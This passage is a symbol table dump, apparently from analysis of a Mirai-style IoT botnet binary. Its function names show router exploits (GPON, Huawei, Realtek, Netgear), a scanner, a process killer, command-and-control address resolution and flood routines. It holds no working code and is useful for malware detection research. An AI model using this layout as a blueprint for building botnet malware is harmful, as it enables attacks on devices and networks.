                            calloc.symtab0x40c910248FUNC<unknown>DEFAULT2
                            calloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            checksum.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            checksum_generic.symtab0x4001c068FUNC<unknown>DEFAULT2
                            checksum_tcpudp.symtab0x400210127FUNC<unknown>DEFAULT2
                            clock.symtab0x40993046FUNC<unknown>DEFAULT2
                            clock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            clock_getres.symtab0x40e20841FUNC<unknown>DEFAULT2
                            clock_getres.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            close.symtab0x4093b041FUNC<unknown>DEFAULT2
                            close.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            closedir.symtab0x409730116FUNC<unknown>DEFAULT2
                            closedir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            completed.2761.symtab0x5185801OBJECT<unknown>DEFAULT10
                            conn_table.symtab0x51a9f88OBJECT<unknown>DEFAULT10
                            connect.symtab0x40bd7443FUNC<unknown>DEFAULT2
                            connect.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            creat.symtab0x40957e14FUNC<unknown>DEFAULT2
                            crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            data_start.symtab0x5180500NOTYPE<unknown>DEFAULT9
                            decodea.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            decoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            decodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            dl-support.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            dnslookup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            dup2.symtab0x4093dc44FUNC<unknown>DEFAULT2
                            dup2.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            encoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            encodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            encodeq.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            environ.symtab0x51a9188OBJECT<unknown>DEFAULT10
                            errno.symtab0x51a93c4OBJECT<unknown>DEFAULT10
                            errno.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            execl.symtab0x40d994287FUNC<unknown>DEFAULT2
                            execl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            execve.symtab0x40e23438FUNC<unknown>DEFAULT2
                            execve.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            exit.symtab0x40d93892FUNC<unknown>DEFAULT2
                            exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            exp10_table.symtab0x417c60208OBJECT<unknown>DEFAULT4
                            exploit_kill.symtab0x4029e016FUNC<unknown>DEFAULT2
                            exploit_pid.symtab0x51a9e44OBJECT<unknown>DEFAULT10
                            exploit_socket_crossweb.symtab0x403150151FUNC<unknown>DEFAULT2
                            exploit_socket_dlink.symtab0x402dd0183FUNC<unknown>DEFAULT2
                            exploit_socket_gpon80.symtab0x4050d0151FUNC<unknown>DEFAULT2
                            exploit_socket_gpon8080.symtab0x405760151FUNC<unknown>DEFAULT2
                            exploit_socket_hnap.symtab0x4032f0183FUNC<unknown>DEFAULT2
                            exploit_socket_huawei.symtab0x403710183FUNC<unknown>DEFAULT2
                            exploit_socket_jaws.symtab0x402f90183FUNC<unknown>DEFAULT2
                            exploit_socket_netgear.symtab0x403c60273FUNC<unknown>DEFAULT2
                            exploit_socket_r7064.symtab0x402c30151FUNC<unknown>DEFAULT2
                            exploit_socket_realtek.symtab0x404690301FUNC<unknown>DEFAULT2
                            exploit_socket_tr064.symtab0x4034b0346FUNC<unknown>DEFAULT2
                            exploit_socket_vacron.symtab0x402aa0140FUNC<unknown>DEFAULT2
                            exploit_worker.symtab0x405d20378FUNC<unknown>DEFAULT2
                            fake_time.symtab0x5186944OBJECT<unknown>DEFAULT10
                            fclose.symtab0x4102f4259FUNC<unknown>DEFAULT2
                            fclose.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            fcntl.symtab0x40934c100FUNC<unknown>DEFAULT2
                            fcntl64.symtab0x40934c100FUNC<unknown>DEFAULT2
                            fd_ctrl.symtab0x5180584OBJECT<unknown>DEFAULT9
                            fd_serv.symtab0x51805c4OBJECT<unknown>DEFAULT9
                            fflush_unlocked.symtab0x410900329FUNC<unknown>DEFAULT2
                            fflush_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            fgetc_unlocked.symtab0x411394222FUNC<unknown>DEFAULT2
                            fgetc_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            fgets.symtab0x4107b8109FUNC<unknown>DEFAULT2
                            fgets.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            fgets_unlocked.symtab0x410a4c116FUNC<unknown>DEFAULT2
                            fgets_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            fmt.symtab0x417c4020OBJECT<unknown>DEFAULT4
                            fopen.symtab0x4103f810FUNC<unknown>DEFAULT2
                            fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            fork.symtab0x40940838FUNC<unknown>DEFAULT2
                            fork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            fputs_unlocked.symtab0x40ab5056FUNC<unknown>DEFAULT2
                            fputs_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            frame_dummy.symtab0x4001500FUNC<unknown>DEFAULT2
                            free.symtab0x40cf97452FUNC<unknown>DEFAULT2
                            free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            fseek.symtab0x4104045FUNC<unknown>DEFAULT2
                            fseeko.symtab0x4104045FUNC<unknown>DEFAULT2
                            fseeko.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            fseeko64.symtab0x41040c218FUNC<unknown>DEFAULT2
                            fseeko64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            fstat.symtab0x40e25c82FUNC<unknown>DEFAULT2
                            fstat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            fstat64.symtab0x40e25c82FUNC<unknown>DEFAULT2
                            fwrite_unlocked.symtab0x40ab88134FUNC<unknown>DEFAULT2
                            fwrite_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            get_hosts_byname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            getc_unlocked.symtab0x411394222FUNC<unknown>DEFAULT2
                            getdents64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            getdtablesize.symtab0x40e3dc35FUNC<unknown>DEFAULT2
                            getdtablesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            getegid.symtab0x40e40038FUNC<unknown>DEFAULT2
                            getegid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            geteuid.symtab0x40e42838FUNC<unknown>DEFAULT2
                            geteuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            getgid.symtab0x40e45038FUNC<unknown>DEFAULT2
                            getgid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            gethostbyname.symtab0x40b98c53FUNC<unknown>DEFAULT2
                            gethostbyname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            gethostbyname_r.symtab0x40b9c4897FUNC<unknown>DEFAULT2
                            gethostbyname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            getpagesize.symtab0x40e47819FUNC<unknown>DEFAULT2
                            getpagesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            getpid.symtab0x40943038FUNC<unknown>DEFAULT2
                            getpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            getppid.symtab0x40945838FUNC<unknown>DEFAULT2
                            getppid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            getrlimit.symtab0x40e48c40FUNC<unknown>DEFAULT2
                            getrlimit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            getrlimit64.symtab0x40e48c40FUNC<unknown>DEFAULT2
                            getsockname.symtab0x40bda041FUNC<unknown>DEFAULT2
                            getsockname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            getsockopt.symtab0x40bdcc50FUNC<unknown>DEFAULT2
                            getsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            getuid.symtab0x40e4b438FUNC<unknown>DEFAULT2
                            getuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            h.5284.symtab0x51a8e032OBJECT<unknown>DEFAULT10
                            h_errno.symtab0x51a9404OBJECT<unknown>DEFAULT10
                            i.symtab0x5185e44OBJECT<unknown>DEFAULT10
                            index.symtab0x40f2b0417FUNC<unknown>DEFAULT2
                            inet_addr.symtab0x410d7028FUNC<unknown>DEFAULT2
                            inet_aton.symtab0x40f7fc137FUNC<unknown>DEFAULT2
                            inet_aton.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            inet_makeaddr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            inet_ntop.symtab0x40b77c527FUNC<unknown>DEFAULT2
                            inet_ntop4.symtab0x40b664280FUNC<unknown>DEFAULT2
                            inet_pton.symtab0x40b477493FUNC<unknown>DEFAULT2
                            inet_pton4.symtab0x40b3f0135FUNC<unknown>DEFAULT2
                            init_exploit.symtab0x4010f0536FUNC<unknown>DEFAULT2
                            initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            initstate.symtab0x40d342110FUNC<unknown>DEFAULT2
                            initstate_r.symtab0x40d5a3185FUNC<unknown>DEFAULT2
                            ioctl.symtab0x409480104FUNC<unknown>DEFAULT2
                            ioctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            ipState.symtab0x51860040OBJECT<unknown>DEFAULT10
                            isatty.symtab0x40b36425FUNC<unknown>DEFAULT2
                            isatty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            kill.symtab0x4094e844FUNC<unknown>DEFAULT2
                            kill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            killer.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            killer_init.symtab0x4008002047FUNC<unknown>DEFAULT2
                            killer_kill.symtab0x40029016FUNC<unknown>DEFAULT2
                            killer_kill_by_port.symtab0x4002a01372FUNC<unknown>DEFAULT2
                            killer_pid.symtab0x51a9a04OBJECT<unknown>DEFAULT10
                            killer_realpath.symtab0x51a9988OBJECT<unknown>DEFAULT10
                            killer_realpath_len.symtab0x5185d04OBJECT<unknown>DEFAULT10
                            lengthd.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            lengthq.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            libc/string/x86_64/memcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            libc/string/x86_64/mempcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            libc/string/x86_64/memset.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            libc/string/x86_64/strchr.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            libc/string/x86_64/strcmp.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            libc/string/x86_64/strcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            libc/string/x86_64/strcspn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            libc/string/x86_64/strlen.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            libc/string/x86_64/strpbrk.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            libc/string/x86_64/strspn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            libc/sysdeps/linux/x86_64/crt1.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            libc/sysdeps/linux/x86_64/crti.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            libc/sysdeps/linux/x86_64/crtn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            libc/sysdeps/linux/x86_64/vfork.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            listFork.symtab0x4010405FUNC<unknown>DEFAULT2
                            listen.symtab0x40be0044FUNC<unknown>DEFAULT2
                            listen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            llseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            lseek.symtab0x40e4e445FUNC<unknown>DEFAULT2
                            lseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            lseek64.symtab0x40e4dc5FUNC<unknown>DEFAULT2
                            main.symtab0x4023901595FUNC<unknown>DEFAULT2
                            main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            malloc.symtab0x40c0a82149FUNC<unknown>DEFAULT2
                            malloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            malloc_trim.symtab0x40d15b28FUNC<unknown>DEFAULT2
                            max.symtab0x5185e04OBJECT<unknown>DEFAULT10
                            memchr.symtab0x40f538240FUNC<unknown>DEFAULT2
                            memchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            memcpy.symtab0x40ac10102FUNC<unknown>DEFAULT2
                            memmove.symtab0x40aec4734FUNC<unknown>DEFAULT2
                            memmove.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            mempcpy.symtab0x40f25090FUNC<unknown>DEFAULT2
                            memrchr.symtab0x40f628237FUNC<unknown>DEFAULT2
                            memrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            memset.symtab0x40ac80210FUNC<unknown>DEFAULT2
                            mmap.symtab0x40e19448FUNC<unknown>DEFAULT2
                            mmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            mozie.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            mremap.symtab0x40e51442FUNC<unknown>DEFAULT2
                            mremap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            munmap.symtab0x40e54038FUNC<unknown>DEFAULT2
                            munmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            mylock.symtab0x5183a040OBJECT<unknown>DEFAULT9
                            mylock.symtab0x5183e040OBJECT<unknown>DEFAULT9
                            mylock.symtab0x51a96040OBJECT<unknown>DEFAULT10
                            nanosleep.symtab0x40e56838FUNC<unknown>DEFAULT2
                            nanosleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            next_start.1440.symtab0x51a6c08OBJECT<unknown>DEFAULT10
                            ntop.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            object.2814.symtab0x5185a048OBJECT<unknown>DEFAULT10
                            open.symtab0x409514106FUNC<unknown>DEFAULT2
                            open.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            opendir.symtab0x4097a4243FUNC<unknown>DEFAULT2
                            opendir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            opennameservers.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            p.2759.symtab0x5180480OBJECT<unknown>DEFAULT9
                            pending_connection.symtab0x5185d41OBJECT<unknown>DEFAULT10
                            poll.symtab0x4102c841FUNC<unknown>DEFAULT2
                            poll.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            prctl.symtab0x40958c44FUNC<unknown>DEFAULT2
                            prctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            prefix.4494.symtab0x41647512OBJECT<unknown>DEFAULT4
                            printf.symtab0x409960157FUNC<unknown>DEFAULT2
                            printf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            qual_chars.4498.symtab0x41649020OBJECT<unknown>DEFAULT4
                            raise.symtab0x41025818FUNC<unknown>DEFAULT2
                            raise.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            rand.symtab0x40d28c11FUNC<unknown>DEFAULT2
                            rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            rand_alphastr.symtab0x405f30311FUNC<unknown>DEFAULT2
                            rand_init.symtab0x405ef059FUNC<unknown>DEFAULT2
                            rand_next.symtab0x405ea072FUNC<unknown>DEFAULT2
                            rand_str.symtab0x406070218FUNC<unknown>DEFAULT2
                            random.symtab0x40d29872FUNC<unknown>DEFAULT2
                            random.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            random_poly_info.symtab0x41712040OBJECT<unknown>DEFAULT4
                            random_r.symtab0x40d4a090FUNC<unknown>DEFAULT2
                            random_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            randtbl.symtab0x518460128OBJECT<unknown>DEFAULT9
                            rawmemchr.symtab0x410c00190FUNC<unknown>DEFAULT2
                            rawmemchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            read.symtab0x4095b839FUNC<unknown>DEFAULT2
                            read.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            read_etc_hosts_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            readdir.symtab0x409898143FUNC<unknown>DEFAULT2
                            readdir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            readlink.symtab0x4095e039FUNC<unknown>DEFAULT2
                            readlink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            realloc.symtab0x40ca08857FUNC<unknown>DEFAULT2
                            realloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            recv.symtab0x40be2c11FUNC<unknown>DEFAULT2
                            recv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            recv_strip_null.symtab0x40681052FUNC<unknown>DEFAULT2
                            recvfrom.symtab0x40be3845FUNC<unknown>DEFAULT2
                            recvfrom.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            resolv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            resolv_domain_to_hostname.symtab0x406180100FUNC<unknown>DEFAULT2
                            resolv_entries_free.symtab0x40615034FUNC<unknown>DEFAULT2
                            resolv_lookup.symtab0x4061f01352FUNC<unknown>DEFAULT2
                            resolve_cnc_addr.symtab0x401050151FUNC<unknown>DEFAULT2
                            resolve_func.symtab0x5180608OBJECT<unknown>DEFAULT9
                            rsck.symtab0x51aa004OBJECT<unknown>DEFAULT10
                            rsck_out.symtab0x51aa0c4OBJECT<unknown>DEFAULT10
                            sbrk.symtab0x40e59074FUNC<unknown>DEFAULT2
                            sbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            scanner.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            scanner10_pid.symtab0x51a9c44OBJECT<unknown>DEFAULT10
                            scanner11_pid.symtab0x51a9c84OBJECT<unknown>DEFAULT10
                            scanner12_pid.symtab0x51a9cc4OBJECT<unknown>DEFAULT10
                            scanner13_pid.symtab0x51a9d84OBJECT<unknown>DEFAULT10
                            scanner2_pid.symtab0x51a9e84OBJECT<unknown>DEFAULT10
                            scanner3_pid.symtab0x51a9c04OBJECT<unknown>DEFAULT10
                            scanner4_pid.symtab0x51a9d04OBJECT<unknown>DEFAULT10
                            scanner5_pid.symtab0x51a9f04OBJECT<unknown>DEFAULT10
                            scanner6_pid.symtab0x51a9e04OBJECT<unknown>DEFAULT10
                            scanner7_pid.symtab0x51a9d44OBJECT<unknown>DEFAULT10
                            scanner8_pid.symtab0x51a9ec4OBJECT<unknown>DEFAULT10
                            scanner9_pid.symtab0x51a9dc4OBJECT<unknown>DEFAULT10
                            scanner_init.symtab0x406a106447FUNC<unknown>DEFAULT2
                            scanner_kill.symtab0x40674016FUNC<unknown>DEFAULT2
                            scanner_pid.symtab0x51aa084OBJECT<unknown>DEFAULT10
                            scanner_rawpkt.symtab0x51866040OBJECT<unknown>DEFAULT10
                            select.symtab0x40960844FUNC<unknown>DEFAULT2
                            select.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            send.symtab0x40be6811FUNC<unknown>DEFAULT2
                            send.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            sendBukkitJoin.symtab0x401ae0714FUNC<unknown>DEFAULT2
                            sendHTTPGET.symtab0x402180313FUNC<unknown>DEFAULT2
                            sendJoin.symtab0x401db0756FUNC<unknown>DEFAULT2
                            sendMotd.symtab0x4015a0356FUNC<unknown>DEFAULT2
                            sendNullping.symtab0x4019b0298FUNC<unknown>DEFAULT2
                            sendRandomBytes.symtab0x401310641FUNC<unknown>DEFAULT2
                            sendRandomName.symtab0x401710670FUNC<unknown>DEFAULT2
                            sendTCP.symtab0x4022c0206FUNC<unknown>DEFAULT2
                            sendUDP.symtab0x4020b0196FUNC<unknown>DEFAULT2
                            sendto.symtab0x40be7448FUNC<unknown>DEFAULT2
                            sendto.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            setsid.symtab0x40963438FUNC<unknown>DEFAULT2
                            setsid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            setsockopt.symtab0x40bea453FUNC<unknown>DEFAULT2
                            setsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            setstate.symtab0x40d2e098FUNC<unknown>DEFAULT2
                            setstate_r.symtab0x40d3f8168FUNC<unknown>DEFAULT2
                            setup_connection.symtab0x406750179FUNC<unknown>DEFAULT2
                            sigaction.symtab0x40e09d247FUNC<unknown>DEFAULT2
                            sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            sigaddset.symtab0x40bf0c35FUNC<unknown>DEFAULT2
                            sigaddset.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            sigempty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            sigemptyset.symtab0x40bf3020FUNC<unknown>DEFAULT2
                            signal.symtab0x40bf44168FUNC<unknown>DEFAULT2
                            signal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            sigprocmask.symtab0x40965c85FUNC<unknown>DEFAULT2
                            sigprocmask.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            sigsetops.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            sleep.symtab0x40dab4415FUNC<unknown>DEFAULT2
                            sleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            snprintf.symtab0x409a00137FUNC<unknown>DEFAULT2
                            snprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            socket.symtab0x40bedc47FUNC<unknown>DEFAULT2
                            socket.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            socket_connect_tcp.symtab0x4029f0171FUNC<unknown>DEFAULT2
                            socket_connect_udp.symtab0x4029d02FUNC<unknown>DEFAULT2
                            spec_and_mask.4497.symtab0x4164b016OBJECT<unknown>DEFAULT4
                            spec_base.4493.symtab0x4164817OBJECT<unknown>DEFAULT4
                            spec_chars.4494.symtab0x4164e021OBJECT<unknown>DEFAULT4
                            spec_flags.4493.symtab0x4164f58OBJECT<unknown>DEFAULT4
                            spec_or_mask.4496.symtab0x4164c016OBJECT<unknown>DEFAULT4
                            spec_ranges.4495.symtab0x4164d09OBJECT<unknown>DEFAULT4
                            sprintf.symtab0x409a8c149FUNC<unknown>DEFAULT2
                            sprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            srand.symtab0x40d3b072FUNC<unknown>DEFAULT2
                            srandom.symtab0x40d3b072FUNC<unknown>DEFAULT2
                            srandom_r.symtab0x40d4fa169FUNC<unknown>DEFAULT2
                            srv_addr.symtab0x51a9b016OBJECT<unknown>DEFAULT10
                            static_id.symtab0x5185302OBJECT<unknown>DEFAULT9
                            static_ns.symtab0x51a9884OBJECT<unknown>DEFAULT10
                            stderr.symtab0x5181308OBJECT<unknown>DEFAULT9
                            stdin.symtab0x5181208OBJECT<unknown>DEFAULT9
                            stdout.symtab0x5181288OBJECT<unknown>DEFAULT9
                            strcasecmp.symtab0x41147448FUNC<unknown>DEFAULT2
                            strcasecmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            strchr.symtab0x40f2b0417FUNC<unknown>DEFAULT2
                            strcmp.symtab0x410ac033FUNC<unknown>DEFAULT2
                            strcoll.symtab0x410ac033FUNC<unknown>DEFAULT2
                            strcpy.symtab0x40f460213FUNC<unknown>DEFAULT2
                            strcspn.symtab0x40ad58135FUNC<unknown>DEFAULT2
                            strdup.symtab0x410d3854FUNC<unknown>DEFAULT2
                            strdup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            strerror_r.symtab0x40b284194FUNC<unknown>DEFAULT2
                            strlen.symtab0x40ade0225FUNC<unknown>DEFAULT2
                            strncat.symtab0x410cc0119FUNC<unknown>DEFAULT2
                            strncat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            strncpy.symtab0x40f718131FUNC<unknown>DEFAULT2
                            strncpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            strnlen.symtab0x40b1a4206FUNC<unknown>DEFAULT2
                            strnlen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            strpbrk.symtab0x410ae8140FUNC<unknown>DEFAULT2
                            strspn.symtab0x410b78135FUNC<unknown>DEFAULT2
                            strtoimax.symtab0x40d7c010FUNC<unknown>DEFAULT2
                            strtok.symtab0x40b35810FUNC<unknown>DEFAULT2
                            strtok.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            strtok_r.symtab0x40f79c94FUNC<unknown>DEFAULT2
                            strtok_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            strtol.symtab0x40d7c010FUNC<unknown>DEFAULT2
                            strtol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            strtoll.symtab0x40d7c010FUNC<unknown>DEFAULT2
                            substring.symtab0x40100045FUNC<unknown>DEFAULT2
                            sysconf.symtab0x40dc54351FUNC<unknown>DEFAULT2
                            sysconf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            system.symtab0x40d65c335FUNC<unknown>DEFAULT2
                            system.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            table.symtab0x51aa20832OBJECT<unknown>DEFAULT10
                            table.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            table_init.symtab0x4084502353FUNC<unknown>DEFAULT2
                            table_key.symtab0x5181144OBJECT<unknown>DEFAULT9
                            table_lock_val.symtab0x408370104FUNC<unknown>DEFAULT2
                            table_retrieve_val.symtab0x40834033FUNC<unknown>DEFAULT2
                            table_unlock_val.symtab0x4083e0104FUNC<unknown>DEFAULT2
                            tcgetattr.symtab0x40b380110FUNC<unknown>DEFAULT2
                            tcgetattr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            time.symtab0x4096b439FUNC<unknown>DEFAULT2
                            time.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            timeout.symtab0x5181104OBJECT<unknown>DEFAULT9
                            times.symtab0x40e5dc39FUNC<unknown>DEFAULT2
                            times.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            tolower.symtab0x40e78c30FUNC<unknown>DEFAULT2
                            tolower.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            type_codes.symtab0x41650024OBJECT<unknown>DEFAULT4
                            type_sizes.symtab0x41651812OBJECT<unknown>DEFAULT4
                            unknown.2050.symtab0x41656814OBJECT<unknown>DEFAULT4
                            unlink.symtab0x4096dc38FUNC<unknown>DEFAULT2
                            unlink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            unsafe_state.symtab0x51842048OBJECT<unknown>DEFAULT9
                            usleep.symtab0x40ddb452FUNC<unknown>DEFAULT2
                            usleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            util.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            util_atoi.symtab0x408e90326FUNC<unknown>DEFAULT2
                            util_fdgets.symtab0x408fe0137FUNC<unknown>DEFAULT2
                            util_itoa.symtab0x409270218FUNC<unknown>DEFAULT2
                            util_local_addr.symtab0x409070120FUNC<unknown>DEFAULT2
                            util_memcpy.symtab0x408e0025FUNC<unknown>DEFAULT2
                            util_memsearch.symtab0x408e4071FUNC<unknown>DEFAULT2
                            util_strcmp.symtab0x40918098FUNC<unknown>DEFAULT2
                            util_strcpy.symtab0x408dc059FUNC<unknown>DEFAULT2
                            util_stristr.symtab0x4090f0132FUNC<unknown>DEFAULT2
                            util_strlen.symtab0x408d9033FUNC<unknown>DEFAULT2
                            util_strncmp.symtab0x4091f0113FUNC<unknown>DEFAULT2
                            util_zero.symtab0x408e2020FUNC<unknown>DEFAULT2
                            vfork.symtab0x40e1c421FUNC<unknown>DEFAULT2
                            vfprintf.symtab0x409d18143FUNC<unknown>DEFAULT2
                            vfprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            vsnprintf.symtab0x409b24199FUNC<unknown>DEFAULT2
                            vsnprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            w.symtab0x5186344OBJECT<unknown>DEFAULT10
                            wait4.symtab0x40e60447FUNC<unknown>DEFAULT2
                            wait4.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            wcrtomb.symtab0x40e7b468FUNC<unknown>DEFAULT2
                            wcrtomb.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            wcsnrtombs.symtab0x40e808140FUNC<unknown>DEFAULT2
                            wcsnrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            wcsrtombs.symtab0x40e7f815FUNC<unknown>DEFAULT2
                            wcsrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            write.symtab0x40970442FUNC<unknown>DEFAULT2
                            write.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            x.symtab0x5186284OBJECT<unknown>DEFAULT10
                            xdigits.3747.symtab0x41710017OBJECT<unknown>DEFAULT4
